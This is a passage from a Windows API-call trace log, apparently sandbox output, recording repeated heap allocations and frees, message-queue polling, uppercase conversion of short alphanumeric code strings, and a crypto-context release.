Flags=0x0, Size=0x4) returned 0x24b13d8 [0258.783] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0258.783] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0258.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0258.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0258.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.784] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0258.784] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0258.784] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0258.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0258.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0258.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.784] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0258.784] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0258.784] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0258.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0258.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0258.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0258.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0258.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0258.785] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0258.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0258.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0258.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0258.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.785] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0258.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0258.785] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0258.785] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0258.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0258.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0258.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0258.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0258.786] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0258.786] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.786] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0258.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0258.786] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0258.786] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0258.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0258.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0258.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0258.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0258.786] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0258.787] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.787] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0258.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0258.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0258.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0258.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0258.787] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.787] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0258.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0258.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0258.787] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0258.787] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0258.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0258.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0258.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0258.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0258.788] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0258.788] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0258.788] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0258.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0258.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0258.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0258.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0258.788] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0258.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0258.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0258.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0258.788] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.788] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0258.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0258.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0258.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0258.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0258.789] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.789] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.789] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0258.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0258.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0258.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0258.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0258.790] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0258.790] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0258.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0258.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0258.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0258.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0258.790] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0258.790] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.790] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.790] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.790] CryptReleaseContext (hProv=0xad2940, dwFlags=0x0) returned 1 [0258.791] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.791] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.791] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.791] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.791] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.791] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.791] FreeLibrary (hLibModule=0x74d40000) returned 1 [0258.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.791] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.791] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0258.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.791] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0258.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0258.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.792] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0258.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0258.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.792] CloseHandle (hObject=0x2d0) returned 1 [0258.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0258.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0258.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0258.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0258.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0258.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0258.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0258.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0258.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0258.793] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0258.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0258.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0258.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0258.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0258.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0258.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0258.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0258.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0258.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0258.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0258.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0258.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0258.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0258.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0258.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0258.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0258.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0258.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0258.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0258.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0258.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0258.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0258.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0258.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0258.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0258.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0258.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0258.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) 